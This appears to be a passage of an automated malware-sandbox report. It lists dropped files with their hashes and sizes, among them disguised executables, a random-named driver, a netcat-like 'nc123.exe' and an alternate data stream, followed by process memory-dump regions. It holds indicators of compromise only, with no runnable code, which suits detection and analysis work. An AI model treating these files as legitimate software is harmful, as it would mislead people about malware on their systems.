                                      9e3365c7860c4766091183d633462f1cc8c30d28871ae2cd8a9a086ce61c0bccf457f919db6826b708f0cf4f88e90f71185420edc4756b7d70137e2096f8797f

                                    • C:\Users\Admin\Downloads\Unconfirmed 861678.crdownload

                                      Filesize

                                      532KB

                                      MD5

                                      00add4a97311b2b8b6264674335caab6

                                      SHA1

                                      3688de985909cc9f9fa6e0a4f2e43d986fe6d0ec

                                      SHA256

                                      812af0ec9e1dfd8f48b47fd148bafe6eecb42d0a304bc0e4539750dd23820a7f

                                      SHA512

                                      aaf5dae929e6b5809b77b6a79ab833e548b66fb628afeb20b554d678947494a6804cb3d59bf6bbcb2b14cede1a0609aa41f8e7fe8a7999d578e8b7af7144cb70

                                    • C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe

                                      Filesize

                                      1.6MB

                                      MD5

                                      8add121fa398ebf83e8b5db8f17b45e0

                                      SHA1

                                      c8107e5c5e20349a39d32f424668139a36e6cfd0

                                      SHA256

                                      35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

                                      SHA512

                                      8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

                                    • C:\Users\Admin\Downloads\ac\lbeohvvepbzkara.sys

                                      Filesize

                                      674KB

                                      MD5

                                      b2233d1efb0b7a897ea477a66cd08227

                                      SHA1

                                      835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

                                      SHA256

                                      5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

                                      SHA512

                                      6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

                                    • C:\Users\Admin\Downloads\ac\mssql.exe

                                      Filesize

                                      10.2MB

                                      MD5

                                      f6a3d38aa0ae08c3294d6ed26266693f

                                      SHA1

                                      9ced15d08ffddb01db3912d8af14fb6cc91773f2

                                      SHA256

                                      c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

                                      SHA512

                                      814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

                                    • C:\Users\Admin\Downloads\ac\mssql2.exe

                                      Filesize

                                      6.7MB

                                      MD5

                                      f7d94750703f0c1ddd1edd36f6d0371d

                                      SHA1

                                      cc9b95e5952e1c870f7be55d3c77020e56c34b57

                                      SHA256

                                      659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

                                      SHA512

                                      af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

                                    • C:\Users\Admin\Downloads\ac\nc123.exe

                                      Filesize

                                      125KB

                                      MD5

                                      597de376b1f80c06d501415dd973dcec

                                      SHA1

                                      629c9649ced38fd815124221b80c9d9c59a85e74

                                      SHA256

                                      f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

                                      SHA512

                                      072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

                                    • C:\Windows\SysWOW64\drivers\spoclsv.exe:SmartScreen

                                      Filesize

                                      7B

                                      MD5

                                      4047530ecbc0170039e76fe1657bdb01

                                      SHA1

                                      32db7d5e662ebccdd1d71de285f907e3a1c68ac5

                                      SHA256

                                      82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

                                      SHA512

                                      8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

                                    • memory/616-869-0x0000000072EC0000-0x0000000072EFE000-memory.dmp

                                      Filesize

                                      248KB

                                    • memory/616-871-0x0000000009420000-0x0000000009444000-memory.dmp

                                      Filesize

                                      144KB

                                    • memory/632-453-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/632-446-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/1252-462-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/1252-455-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/1284-547-0x0000000010000000-0x0000000010030000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/1284-550-0x0000000010000000-0x0000000010030000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/1284-548-0x00000000005E0000-0x0000000000655000-memory.dmp

                                      Filesize

                                      468KB

                                    • memory/1364-434-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/1364-432-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/1924-452-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/2664-819-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-924-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-545-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-285-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-619-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-286-0x00000000005E0000-0x00000000005E5000-memory.dmp

                                      Filesize

                                      20KB

                                    • memory/2664-287-0x00000000005A0000-0x00000000005C4000-memory.dmp

                                      Filesize

                                      144KB

                                    • memory/2664-488-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-324-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-572-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-892-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-874-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-800-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-872-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-375-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-418-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-812-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-867-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-865-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2664-854-0x0000000000400000-0x0000000000483000-memory.dmp

                                      Filesize

                                      524KB

                                    • memory/2712-958-0x0000000000CC0000-0x0000000000D28000-memory.dmp

                                      Filesize

                                      416KB

                                    • memory/2712-978-0x0000000000CC0000-0x0000000000D28000-memory.dmp

                                      Filesize

                                      416KB

                                    • memory/2712-966-0x0000000000CC0000-0x0000000000D28000-memory.dmp

                                      Filesize

                                      416KB

                                    • memory/2852-461-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/2852-463-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/3404-195-0x0000000000400000-0x000000000040E000-memory.dmp

                                      Filesize

                                      56KB

                                    • memory/3404-251-0x0000000000400000-0x000000000040E000-memory.dmp

                                      Filesize

                                      56KB

                                    • memory/3680-360-0x0000000001000000-0x0000000001026000-memory.dmp

                                      Filesize

                                      152KB

                                    • memory/3680-358-0x0000000001000000-0x0000000001026000-memory.dmp

                                      Filesize

                                      152KB

                                    • memory/3820-541-0x0000000010000000-0x0000000010030000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/3820-818-0x0000000140000000-0x0000000140ACB000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3820-810-0x0000000140000000-0x0000000140ACB000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3820-542-0x00000000005E0000-0x0000000000655000-memory.dmp

                                      Filesize

                                      468KB

                                    • memory/3820-544-0x0000000010000000-0x0000000010030000-memory.dmp

                                      Filesize

                                      192KB

                                    • memory/3840-758-0x0000000000400000-0x0000000000B02000-memory.dmp

                                      Filesize

                                      7.0MB

                                    • memory/3840-879-0x0000000000400000-0x0000000000B02000-memory.dmp

                                      Filesize

                                      7.0MB

                                    • memory/3840-811-0x0000000000400000-0x0000000000B02000-memory.dmp

                                      Filesize

                                      7.0MB

                                    • memory/4196-443-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/4776-427-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/4776-435-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/4820-437-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB

                                    • memory/4820-444-0x0000000000400000-0x0000000000444000-memory.dmp

                                      Filesize

                                      272KB